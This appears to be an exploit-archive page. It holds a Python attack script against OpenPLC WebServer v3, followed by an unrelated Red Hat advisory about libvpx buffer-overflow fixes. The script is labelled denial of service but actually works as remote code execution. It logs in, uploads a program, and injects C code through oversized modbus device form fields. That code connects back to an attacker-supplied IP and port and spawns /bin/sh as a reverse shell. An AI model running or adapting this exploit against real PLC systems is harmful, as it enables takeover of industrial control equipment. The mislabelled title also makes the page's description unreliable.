OpenPLC WebServer version 3 suffers from a denial of service vulnerability.

    # Exploit Title: OpenPLC WebServer 3 - Denial of Service# Date: 10.09.2023# Exploit Author: Kai Feng# Vendor Homepage: https://autonomylogic.com/# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git# Version: Version 3 and 2# Tested on: Ubuntu 20.04import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")options, args = parser.parse_args()if not options.url:    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    print('[+] Specify an url target')    print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")    exit()host = options.urllogin = options.url + '/login' upload_program = options.url + '/programs'compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc'user = options.userpassword = options.passwrev_ip = options.riprev_port = options.rportx = requests.Session()def auth():    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    time.sleep(1)    print('[+] Checking if host '+host+' is Up...')    host_up = x.get(host)    try:        if host_up.status_code == 200:            print('[+] Host Up! ...')    except:        print('[+] This host seems to be down :( ')        sys.exit(0)    print('[+] Trying to authenticate with credentials '+user+':'+password+'')     time.sleep(1)       submit = {        'username': user,        'password': password    }    x.post(login, data=submit)    response = x.get(upload_program)                if len(response.text) > 30000 and response.status_code == 200:        print('[+] Login success!')        time.sleep(1)    else:        print('[x] Login failed :(')        sys.exit(0)  def injection():    print('[+] PLC program uploading... ')    upload_url = host + "/upload-program"     upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}    upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"}     upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n  VAR\n    var_in : BOOL;\n    var_out : BOOL;\n  END_VAR\n\n  var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n  RESOURCE Res0 ON PLC\n    TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n    PROGRAM Inst0 WITH Main : prog0;\n  END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"    upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)    act_url = host + "/upload-program-action"    act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}    act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"    upload_act = x.post(act_url, headers=act_headers, data=act_data)    time.sleep(2)def connection():    print('[+] add device...')    inject_url = host + "/add-modbus-device"    # inject_dash = host + "/dashboard"    inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}    inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}    inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111                                # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n   \r\n    \r\n    \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n    int port = "+rev_port+";\r\n    struct sockaddr_in revsockaddr;\r\n\r\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n    revsockaddr.sin_family = AF_INET;       \r\n    revsockaddr.sin_port = htons(port);\r\n    revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n    connect(sockt, (struct sockaddr *) &revsockaddr, \r\n    sizeof(revsockaddr));\r\n    dup2(sockt, 0);\r\n    dup2(sockt, 1);\r\n    dup2(sockt, 2);\r\n\r\n    char * const argv[] = {\"/bin/sh\", NULL};\r\n    execve(\"/bin/sh\", argv, NULL);\r\n\r\n    return 0;  \r\n    \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"    inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)    time.sleep(3)    # comp = x.get(compile_program)    # time.sleep(6)    # x.get(inject_dash)    # time.sleep(3)    # print('[+] Spawning Reverse Shell...')    start = x.get(run_plc_server)    time.sleep(1)    if start.status_code == 200:        print('[+] Reverse connection receveid!')         sys.exit(0)    else:        print('[+] Failed to receive connection :(')        sys.exit(0)auth()injection()connection()

OpenPLC WebServer 3 Denial Of Service

Red Hat Security Advisory 2023-5537-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5537-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5537  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
libvpx-1.7.0-10.el8_8.src.rpm

aarch64:  
libvpx-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.aarch64.rpm

ppc64le:  
libvpx-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.ppc64le.rpm

s390x:  
libvpx-1.7.0-10.el8_8.s390x.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_8.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.s390x.rpm

x86_64:  
libvpx-1.7.0-10.el8_8.i686.rpm  
libvpx-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_8.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
libvpx-debuginfo-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.aarch64.rpm  
libvpx-devel-1.7.0-10.el8_8.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-devel-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.7.0-10.el8_8.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_8.s390x.rpm  
libvpx-devel-1.7.0-10.el8_8.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.s390x.rpm

x86_64:  
libvpx-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_8.x86_64.rpm  
libvpx-devel-1.7.0-10.el8_8.i686.rpm  
libvpx-devel-1.7.0-10.el8_8.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvLAAoJENzjgjWX9erEahUP/iXQ79lCk5ytBlnyduTi88a5  
umXetrpR8WsbbGyqx/ouILHA34c1G7sUX5SU6mrIlLUfSXvO/67yNJVzf3O6kTqm  
O/gEkO7RooygyskVu5sTl98SkZ7xOIhg7k1mqa5Ucgojm8wGu8jpcg+pWftGG+aK  
veRYSwFpwL+uybJghiJvv9mPgN69oE1dnXTfS6KgstnF+irpLQ4iPp3PgfH3nma7  
grWqR7E3Z1Mg4Qi2zFmD8Mat4iHprSe7UfztmMipq5Hv2OsmUOMbdtGvwD0zYjfA  
CEB71SFp1OeqZLKz6Vm0y7fYMYwlP5rRUe9P0o/qrY7nU0/XgbDMGBJuYErV0w+M  
qQMXE2gV7+u6LTzrL5+W0n8C+3NKatkR+BG2KDOf9iGgFgf+ugcZ117yU8uLFcRi  
JG3lBb6Bft9QtUBHODtA5cKn/uoHQw4k60JvE3IG11+N6q2n5GJevTdfY664So8X  
RDnow0pI3xugoPUG0UK74AanZM95ShNicXd8v9j3o4Ha9zp1laUgHg+CGmi3IdDe  
EuL2HpBbXdQDg5yjzaM+IrKj2ICkCI5DStVirknKxd4dMBGGbl+4RjlXl0CIBcVg  
lRPZB6UsAc23yq4zdM8RAazbgUkUDOSmD4MiVpj18qjpNtEbYnpLpJ+Gl2Go+pB5  
d8Fd2GhuQt+tMhHThYdr  
=92bt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#web